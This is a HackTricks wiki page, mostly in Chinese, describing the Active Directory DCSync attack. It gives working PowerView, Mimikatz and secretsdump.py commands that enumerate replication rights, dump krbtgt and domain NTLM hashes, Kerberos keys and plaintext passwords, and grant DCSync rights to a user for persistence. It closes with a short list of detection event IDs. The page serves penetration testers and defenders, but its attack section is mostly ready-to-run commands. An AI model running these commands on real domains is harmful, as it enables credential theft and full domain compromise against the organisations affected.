DCSync

使用 Trickest 轻松构建和 自动化工作流程，由世界上 最先进 的社区工具提供支持。今天获取访问权限：

Automate OffSec, EASM, and Custom Security Processes | Trickest

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

DCSync

DCSync 权限意味着对域本身拥有以下权限：DS-Replication-Get-Changes、Replicating Directory Changes All 和 Replicating Directory Changes In Filtered Set。

关于 DCSync 的重要说明：

DCSync 攻击模拟域控制器的行为，并请求其他域控制器复制信息，使用目录复制服务远程协议 (MS-DRSR)。由于 MS-DRSR 是 Active Directory 的有效且必要的功能，因此无法关闭或禁用。
默认情况下，只有 域管理员、企业管理员、管理员和域控制器 组具有所需的权限。
如果任何帐户密码以可逆加密存储，Mimikatz 中提供了一个选项可以以明文返回密码。

Enumeration

使用 powerview 检查谁拥有这些权限：

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

本地利用

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

远程利用

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc 生成 3 个文件：

一个包含 NTLM 哈希
一个包含 Kerberos 密钥
一个包含 NTDS 中任何设置了 可逆加密 的帐户的明文密码。您可以通过以下命令获取具有可逆加密的用户：

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

持久性

如果您是域管理员，您可以借助 powerview 将此权限授予任何用户：

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

然后，您可以检查用户是否正确分配了这3个权限，通过在输出中查找它们（您应该能够在“ObjectType”字段中看到权限的名称）：

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

Mitigation

安全事件 ID 4662 (对象的审计策略必须启用) – 对一个对象执行了操作
安全事件 ID 5136 (对象的审计策略必须启用) – 修改了一个目录服务对象
安全事件 ID 4670 (对象的审计策略必须启用) – 对一个对象的权限进行了更改
AD ACL 扫描器 - 创建和比较 ACL 的创建报告。 https://github.com/canix1/ADACLScanner

References

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

PreviousDCShadow NextDiamond Ticket

Last updated 4 months ago